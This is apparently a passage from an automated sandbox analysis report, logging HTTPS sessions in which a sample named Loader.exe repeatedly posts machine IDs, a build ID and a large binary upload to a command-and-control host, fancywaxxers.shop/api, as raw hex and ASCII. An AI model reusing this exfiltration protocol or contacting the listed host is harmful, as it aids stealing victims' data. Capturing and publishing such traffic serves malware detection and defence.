                                                                                                Data Ascii: --OG750WXNTGContent-Disposition: form-data; name="hwid"2106D7020EE20555E1B71982A10B646A--OG750WXNTGContent-Disposition: form-data; name="pid"2--OG750WXNTGContent-Disposition: form-data; name="lid"yau6Na--6524795094--OG750WXNTGCon
                                                                                                2025-01-01 01:57:00 UTC1127INHTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:57:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=6uuvi1jdta0uergiejjbjo7j93; expires=Sat, 26 Apr 2025 19:43:39 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M2XVbFOv1YJE6O46uam8hPLslH1x2hxsWViV6hAqWVDkxMktwYNaa6sJVxt6WY437QvZ1QSLRvxsHJ6D0RPaM7lfRQPcIpV8WvcoXWUHRIwncXnolMnelOHgj0%2B7cfRv49gcow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee5624b158c15-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1788&rtt_var=680&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9673&delivery_rate=1599123&cwnd=238&unsent_bytes=0&cid=661be68bb5b61e2b&ts=561&x=0"
                                                                                                2025-01-01 01:57:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-01 01:57:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.449734104.21.48.14432588C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-01 01:57:01 UTC278OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=XC0RK74IM4TDJ
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 20412
                                                                                                Host: fancywaxxers.shop
                                                                                                2025-01-01 01:57:01 UTC15331OUTData Raw: 2d 2d 58 43 30 52 4b 37 34 49 4d 34 54 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 30 36 44 37 30 32 30 45 45 32 30 35 35 35 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 58 43 30 52 4b 37 34 49 4d 34 54 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 43 30 52 4b 37 34 49 4d 34 54 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 0d 0a 2d 2d 58 43 30 52 4b 37
                                                                                                Data Ascii: --XC0RK74IM4TDJContent-Disposition: form-data; name="hwid"2106D7020EE20555E1B71982A10B646A--XC0RK74IM4TDJContent-Disposition: form-data; name="pid"3--XC0RK74IM4TDJContent-Disposition: form-data; name="lid"yau6Na--6524795094--XC0RK7
                                                                                                2025-01-01 01:57:01 UTC5081OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                2025-01-01 01:57:01 UTC1131INHTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:57:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=ftl9jmtsl0a81r7p3s240oui9u; expires=Sat, 26 Apr 2025 19:43:40 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0EFSyPhydB1EKQj2NdqaAb5Wlp735YI2uGE77mwkjE%2FXuAAKl409VZQ65rSNjgUxEAndA6zwwm0E2va9cYCVLptvNsmE4swJ5UAHO6j9RP7e2DSDe%2BXHV0QoEcd6sXcaE4UY0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee56a1f09c323-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1469&rtt_var=649&sent=17&recv=28&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21370&delivery_rate=1568206&cwnd=214&unsent_bytes=0&cid=1dd28fa8d8e356b3&ts=521&x=0"
                                                                                                2025-01-01 01:57:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-01 01:57:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.449735104.21.48.14432588C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-01 01:57:02 UTC273OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=3HXJG0UTZ
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 1218
                                                                                                Host: fancywaxxers.shop
                                                                                                2025-01-01 01:57:02 UTC1218OUTData Raw: 2d 2d 33 48 58 4a 47 30 55 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 30 36 44 37 30 32 30 45 45 32 30 35 35 35 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 33 48 58 4a 47 30 55 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 48 58 4a 47 30 55 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 0d 0a 2d 2d 33 48 58 4a 47 30 55 54 5a 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                Data Ascii: --3HXJG0UTZContent-Disposition: form-data; name="hwid"2106D7020EE20555E1B71982A10B646A--3HXJG0UTZContent-Disposition: form-data; name="pid"1--3HXJG0UTZContent-Disposition: form-data; name="lid"yau6Na--6524795094--3HXJG0UTZContent
                                                                                                2025-01-01 01:57:03 UTC1136INHTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:57:03 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=nl86ctaj5sg1snlvjofa8uused; expires=Sat, 26 Apr 2025 19:43:41 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uofs%2FCe8EoNsfolATh%2BWs%2FT9wSlPrv3lWVi%2FHezkUiBqABRzJVP90IrjAZOI4VpNBbCZQgv7Qc7V69N1GkXEqrjh8BF%2BEM8fYT1Zr1KffU2wutwyjrwSjFp%2BxJl1hLwAbUOYmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee5731e93c461-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1644&rtt_var=639&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2127&delivery_rate=1683967&cwnd=228&unsent_bytes=0&cid=d227498ab77623f3&ts=745&x=0"
                                                                                                2025-01-01 01:57:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-01 01:57:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.449736104.21.48.14432588C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-01 01:57:04 UTC280OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=GDPI4RY1FL2OPH
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 586169
                                                                                                Host: fancywaxxers.shop
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: 2d 2d 47 44 50 49 34 52 59 31 46 4c 32 4f 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 30 36 44 37 30 32 30 45 45 32 30 35 35 35 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 47 44 50 49 34 52 59 31 46 4c 32 4f 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 44 50 49 34 52 59 31 46 4c 32 4f 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 0d 0a 2d 2d 47 44 50
                                                                                                Data Ascii: --GDPI4RY1FL2OPHContent-Disposition: form-data; name="hwid"2106D7020EE20555E1B71982A10B646A--GDPI4RY1FL2OPHContent-Disposition: form-data; name="pid"1--GDPI4RY1FL2OPHContent-Disposition: form-data; name="lid"yau6Na--6524795094--GDP
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: 49 97 1c 5f 95 b3 71 5c 24 43 41 21 fd e7 c9 b9 2b b6 ce 74 31 e8 81 76 fe 7b b0 cc 08 72 98 65 07 91 8a cf 0f c2 b5 37 e2 f0 83 0f 42 bb 7e 9c 56 94 32 02 ca 63 fb 36 be 51 c2 93 60 ff 47 d5 1e fd c7 e2 70 cb 2f 42 f6 34 8c 75 f8 df b0 d7 60 19 89 bf 8e e0 58 ee 62 e8 45 88 2e 8f ab 6c f4 7b cb 91 1f c1 97 50 80 03 99 4f 0c 15 d0 85 a8 f6 77 06 d9 66 84 7c 01 d7 62 b6 e2 8b da 21 88 77 e6 3d c8 f9 bf c5 99 e9 80 5a d4 06 e6 71 e0 91 01 39 97 09 18 b3 5c 80 9f ae 53 a7 87 c6 7a c5 33 f2 f4 bd f9 51 ac 23 88 bc 8c 86 f7 f4 43 5f a5 bf 44 c1 37 95 f3 45 41 11 a2 d3 7a 38 41 dc e0 52 41 38 8e 78 cc b8 82 8a d6 b0 04 61 47 f7 dd 9c e9 b3 9b 0f 35 d1 e2 4f 42 e8 92 59 2a 8c ca 2d 34 77 8d ae f4 c5 9f 6d 56 ac 0e 17 89 b0 fb b1 ea 94 72 48 2d d7 0d 4a 6f 65 75
                                                                                                Data Ascii: I_q\$CA!+t1v{re7B~V2c6Q`Gp/B4u`XbE.l{POwf|b!w=Zq9\Sz3Q#C_D7EAz8ARA8xaG5OBY*-4wmVrH-Joeu
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: c1 20 12 35 bc 2d c0 80 36 1d 0e f3 b9 42 54 e5 ac 3a fd 64 84 b5 49 ac ca 2f 12 dc 6d 8a 26 bf 43 ea 82 07 ec 5e 0c 29 46 d0 31 11 a8 cb a1 66 fe df 8d 9a 1e 9f 80 6e 77 43 59 c0 5c 86 a2 91 b8 a5 04 31 60 b8 56 04 5c ed 4b 4c 0c 10 f1 a7 70 6f 7d 60 0e 32 a7 ab 19 a8 16 46 32 8a 5e dd f2 d9 e5 a1 2e fb 11 c9 5b 39 8a bf 0d 1d 46 65 83 84 5e 8d eb 1f 8e 7b 5d 1b 0a ed d9 c6 d3 33 8f c8 b8 83 49 31 49 58 08 f5 1b 9f c4 24 f4 b5 b2 a6 7d e7 61 df 52 dc 5b 55 e2 1a d4 b8 eb 7f 7e 79 24 02 24 9c 95 96 df 8b f9 1c c6 71 44 a6 a7 43 f8 c4 8e ab 0f 4f 2e 12 56 a1 aa f6 dd 15 49 a9 f0 2c a1 08 4b 1a ad 8e 0e 90 df 4e 5f 8b c7 4a a7 60 45 f8 33 6a 7d a6 55 f6 9b 09 ca 6d 6c 38 99 5c de fd db af 3f 5e c2 24 2d c9 ba 76 11 54 5c 80 21 a0 fd 53 e2 f0 ef 27 bd 52 94
                                                                                                Data Ascii: 5-6BT:dI/m&C^)F1fnwCY\1`V\KLpo}`2F2^.[9Fe^{]3I1IX$}aR[U~y$$qDCO.VI,KN_J`E3j}Uml8\?^$-vT\!S'R
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: a6 65 dd 3f 8f 2f 27 78 be 30 38 b4 28 02 fa 1e b9 eb a1 66 07 2c 78 c1 f4 de 8f ed 12 d9 24 f4 cc e7 74 ca 65 a0 a5 c7 4c 9e 84 22 4a ed 2f 3d e7 18 4f 98 58 c4 c5 99 74 f7 c6 44 4a 7d 54 6a cc f9 66 c7 4b 54 a3 3b 94 e5 fa 59 f0 0a f5 63 21 20 e0 7e 62 f0 4e e7 f7 a6 27 e7 c8 52 fb 81 cb 58 f8 88 5b 74 6a c6 7a b5 34 38 34 cd 95 3d 14 5c 7b e3 5b 66 79 ff a0 f8 95 d4 cb 27 2f 16 9b f3 00 de ac 33 68 a8 ee bd 23 76 14 c7 9f 55 80 35 2d 57 5a b4 9d ae ec ea f9 c4 f5 c2 e4 05 df 70 50 07 48 21 7c f9 9c e1 f5 d8 99 d1 5a ec 37 33 c1 79 ca ee e5 88 25 3d 93 da bf f9 33 92 8c ae ff ce 68 b8 eb f2 61 e7 8b 3c c8 9c 7f 55 10 7a 2e d3 78 5f 64 92 06 0d b5 70 62 f0 44 3c bb 92 e3 56 a1 b0 c5 f9 e9 ff 7a d6 f8 ca ed b4 9b eb df d9 e6 11 76 ed 23 de ec 6a 2d 55 2d
                                                                                                Data Ascii: e?/'x08(f,x$teL"J/=OXtDJ}TjfKT;Yc! ~bN'RX[tjz484=\{[fy'/3h#vU5-WZpPH!|Z73y%=3ha<Uz.x_dpbD<Vzv#j-U-
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: 22 20 aa de de 63 8e d9 01 7b e5 ab 0f 38 b0 2d 40 de 7b 12 d1 44 34 ca 6b ac 10 69 0e 99 cd 89 08 d7 f3 e7 1d 56 54 5b e9 28 d3 8c 92 5f fc bd 2c 11 1d d3 25 75 64 73 72 02 f9 f4 ac 6b c6 a2 a7 ad 91 28 2d 48 29 48 b0 4f b2 d0 3a e6 f7 3f 79 42 63 29 26 30 53 37 70 bf 82 3c 30 fa 16 df 61 7d 8b 1b 6d 75 d2 5d 02 9b 64 21 2d 17 81 f6 0c 5c 3f 47 c8 5d fa 5e 6f 11 77 9d 07 fb fb 9c 57 5a cc b4 f2 e9 6c cf 0c ca b3 27 30 32 3a ef 95 b7 7c d1 88 29 8a fe d0 19 53 60 96 c1 c8 bd 4c b8 99 bc 3a b3 2b 76 e9 04 ac 2d b0 74 7b 0b 3a 8c 3d 2d 3d dd 4f e8 68 43 04 38 5f 3c 2c 89 b3 21 85 bf 2d fa c8 8d a5 2b f4 c7 04 99 91 fe af 06 f9 bf 39 e6 ff 34 c8 63 7d 41 b2 0a a0 1f 4b 06 6f 51 f6 4a 34 45 d0 73 77 65 02 0d cb 31 16 dc dc e9 c3 8d 5b 76 41 18 20 26 79 0b 10
                                                                                                Data Ascii: " c{8-@{D4kiVT[(_,%udsrk(-H)HO:?yBc)&0S7p<0a}mu]d!-\?G]^owWZl'02:|)S`L:+v-t{:=-=OhC8_<,!-+94c}AKoQJ4Eswe1[vA &y
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: 32 69 df 89 71 97 c3 77 8e 12 d5 21 d8 5a 09 6a 4f f2 6c 56 a7 84 8e 56 14 f3 56 27 31 ea 7b 21 c1 f7 57 cf 9e 41 bd b8 b1 17 e8 07 5b 2b b2 ac c1 31 66 74 68 b1 88 24 90 40 d9 bb a4 c5 b1 ef 5c 2a 7f fb 11 af 5d 59 1d fc 04 ce c7 6f f3 46 dd 54 f7 05 37 46 3a be 37 f0 0b 82 bd 38 fb 36 7e 04 1f 0b 4b d7 e0 35 b1 3c 25 44 1a 1a 78 d6 ac 68 bc d7 19 a9 8f 9a d6 1c 67 67 66 e0 24 ef 32 27 71 09 78 7b 42 e9 71 eb 6f 87 e3 5d da 44 8e 31 b3 ce 64 91 84 28 78 94 df 0e 12 89 e4 9c 6a 66 82 0d 4d 16 73 55 bc 53 71 61 3e 5b fa 69 17 8d 00 e4 85 5e eb 10 7d 80 aa 0d cf 74 97 2b ac 9c 36 31 db 12 dc 57 f0 c1 89 ad 74 94 a6 9f a7 75 40 91 d8 48 c0 7b b4 da 34 76 1d a2 4e 49 9c b5 49 7b 72 27 12 a4 ff 7d fc 2f 29 8e 1f 01 04 59 ca 92 20 52 18 d5 31 58 eb f2 e7 10 d1
                                                                                                Data Ascii: 2iqw!ZjOlVVV'1{!WA[+1fth$@\*]YoFT7F:786~K5<%Dxhggf$2'qx{Bqo]D1d(xjfMsUSqa>[i^}t+61Wtu@H{4vNII{r'}/)Y R1X
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: 94 71 5a 64 61 40 b3 55 17 70 66 a7 ee fe 6f 16 43 c2 e6 8c 96 7f 51 40 03 f3 d3 87 27 ad 0f ee 53 a8 bb 78 3d 7f 09 79 89 23 59 8c 11 5b 0b d5 db 7a e1 41 77 20 12 99 55 71 54 fc e6 01 64 5f 14 c7 4c 94 a2 b8 be c2 d0 42 60 87 8f 1c 21 bd 65 07 b3 2b 2d b4 66 f7 81 6f 96 17 60 24 98 d1 a2 97 50 9f 1e d4 31 bb 27 ee 4e ba b8 2f 83 84 06 13 14 59 0f 01 51 33 3f c9 1a 1c fc 2f c1 42 86 95 0b 58 4c d5 60 fc 77 bb 1d 3a d6 e4 92 59 bd a7 8e de 17 fc 7a d0 e6 6a 58 5a 5d d8 ee 43 1c d4 cf 6a 11 d7 0b 61 82 0b 66 20 81 5d d9 6c 63 1f 8e 18 07 8c a6 64 0a a0 4c 81 11 9d 6b e0 ad a2 95 12 5c 5e 32 53 e5 0e 44 7f ad 09 85 99 a4 ac 7f 2b cd af 0b 13 e4 85 6b 5b ba 60 eb de 66 cd 54 f9 72 c5 51 37 a4 e4 98 62 33 55 30 fc 57 b5 c5 8f 05 0b 9b b4 32 ae ef ac 53 3d b6
                                                                                                Data Ascii: qZda@UpfoCQ@'Sx=y#Y[zAw UqTd_LB`!e+-fo`$P1'N/YQ3?/BXL`w:YzjXZ]Cjaf ]lcdLk\^2SD+k[`fTrQ7b3U0W2S=
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: a7 69 1c 90 dd cf 6b 10 05 bd 1c 97 ba 48 d8 bc c9 d8 1a 9d ce f5 60 79 15 8d fe 85 05 12 98 82 8c 20 6b 55 cc 2a 73 da c9 c0 d7 66 98 55 cc ce e4 4e d4 71 d7 d7 be 88 60 e0 4f 9d cc 83 a0 a8 94 fe 26 05 ae b6 91 70 4b 14 ec 3a 57 be d4 ac 24 5f 19 6e 6d 46 f9 58 a1 82 b8 79 3e fb 80 b0 78 7e df f4 d3 5a fd d8 28 e1 9f 9a e9 49 6b df 54 0d ef 02 dc 1b f7 dc f3 c0 e1 a1 aa a1 0d a3 f4 2c 20 23 10 49 97 23 99 27 50 f0 a9 7f 44 80 cc fc 73 a6 ab 2e df 8c 40 9d 30 a7 ff 8b 02 53 39 a6 df df 9f c6 51 bc 90 a4 db 7b c9 c2 88 1c 49 70 ee 08 ad 57 03 bd d2 80 00 db 90 05 08 78 66 fb 56 9c cc fb 92 2e 46 9d 15 42 e5 0d d3 27 e7 8b 75 e8 41 d7 30 40 9f 6b 2d c1 fd fa 90 9d 92 1a c5 38 73 a0 db 82 61 28 d5 06 13 1d 45 6a b1 f3 4d 5d 2a 8b e3 01 08 49 e6 c7 b7 29 00
                                                                                                Data Ascii: ikH`y kU*sfUNq`O&pK:W$_nmFXy>x~Z(IkT, #I#'PDs.@0S9Q{IpWxfV.FB'uA0@k-8sa(EjM]*I)
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: c5 b5 c7 76 38 80 2b 4a b6 31 27 b2 75 fb 96 8e a8 4c 4e 08 8b d1 cf ec c5 b6 1e 12 4f 49 22 0d 7c 67 b5 1d 39 96 9d bb 84 3e e4 4e 21 48 40 25 d7 89 b5 e6 25 88 62 c2 0e ff f9 e9 c1 99 e2 ce 68 53 92 59 f9 a6 fc cc 65 b6 ef 8f 04 46 b7 a4 d2 67 d3 0e c8 d3 91 76 68 37 6e 3e b9 80 84 1d f7 5e 7a 0e d6 01 17 cb ff 5d fc 19 66 24 c6 4f f8 c1 63 f0 4c 5d b4 ec 87 97 fc 60 4e ba 38 f8 3c 13 6e ed d4 b8 9e ef 7c 7b 53 14 7e 43 e1 7f 93 36 f2 94 c4 c6 63 ed 34 66 72 3b d9 08 40 1c c0 03 48 68 13 0b fd 06 4a 22 84 a4 d7 95 28 ea cf c1 cd 57 e8 1e 8d 26 64 b6 1a ae 7e ff a4 c8 9f 7f 61 6a 54 5a 64 c4 36 a2 92 6d b9 3d 54 d1 88 e4 5a 8b ca fd 8a 06 1c 77 61 3d 02 21 d6 6b ba 6c 3a 16 81 b2 a0 08 9e 86 63 8f aa 7c 29 f3 78 4a 11 fd 30 f0 72 28 f3 f6 94 7b 55 63 61
                                                                                                Data Ascii: v8+J1'uLNOI"|g9>N!H@%%bhSYeFgvh7n>^z]f$OcL]`N8<n|{S~C6c4fr;@HhJ"(W&d~ajTZd6m=TZwa=!kl:c|)xJ0r({Uca
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: 9f b4 13 0c e0 39 0e 04 8a 28 50 35 7b 42 43 05 54 b3 d6 58 4a 40 cb 09 c6 33 d0 6b cb 17 7a 45 00 e7 2e 06 9e b3 55 00 e1 9b 2b 5d 4b a2 8a 07 47 0b 2b 17 8f 73 e7 cb 03 d7 63 ad cf 05 c5 c0 7c 5f ca 98 4e 9d e2 63 1a 3e 58 02 a5 89 96 ff eb 20 b7 09 82 66 42 d1 eb 31 ba 73 13 4c 9a 93 ad d7 aa b9 b3 d7 b2 ad 86 81 9e bb 15 34 14 bc 44 fb 48 01 b5 ca 69 18 19 1d 73 23 e4 90 8a b7 56 c0 e0 48 38 cb 0b ce d5 53 88 6d 15 4f 22 1d db 5e 3b 29 a6 54 c8 ef 91 1c 75 8f 50 1b 5f 74 2c 49 41 e0 a5 19 f0 8e dd 7a 40 c5 9c 02 df 3c 9a fd e7 c9 06 89 5c af 11 74 a4 f6 be eb d5 36 40 ef 97 d0 99 f9 f3 fe 94 c2 73 43 1c 35 8e 3d 48 43 84 f3 91 79 74 4c b4 2c f7 fe 3d 10 1a b0 f2 92 ad 1b 65 52 d6 f5 69 3d 27 aa 57 fc 34 0b 9f 14 20 20 db 56 f8 1b 9b 1e e8 2d 85 18 f6
                                                                                                Data Ascii: 9(P5{BCTXJ@3kzE.U+]KG+sc|_Nc>X fB1sL4DHis#VH8SmO"^;)TuP_t,IAz@<\t6@sC5=HCytL,=eRi='W4 V-
                                                                                                2025-01-01 01:57:05 UTC1143INHTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:57:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=kg91krtdq4i75tsqlq4i2q5udk; expires=Sat, 26 Apr 2025 19:43:44 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdUqCSXWR1tXIR11qOHD%2BrhUzduukyOjUFsxgyRe%2BcM%2BvnCMWCBFE3Vat7Vcg1zhMkgJ%2FfUdpV%2FPI1aVaGCu2CIcis7NiD5xQHLqGzqs%2FDmvb0v4TKAWPZOou2U4g6Npf1MRSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee57dccb2c323-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1470&rtt_var=569&sent=344&recv=603&lost=0&retrans=0&sent_bytes=2843&recv_bytes=588757&delivery_rate=1893644&cwnd=214&unsent_bytes=0&cid=8df705c945937c45&ts=1679&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.449737104.21.48.14432588C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-01 01:57:06 UTC265OUTPOST /api HTTP/1.1
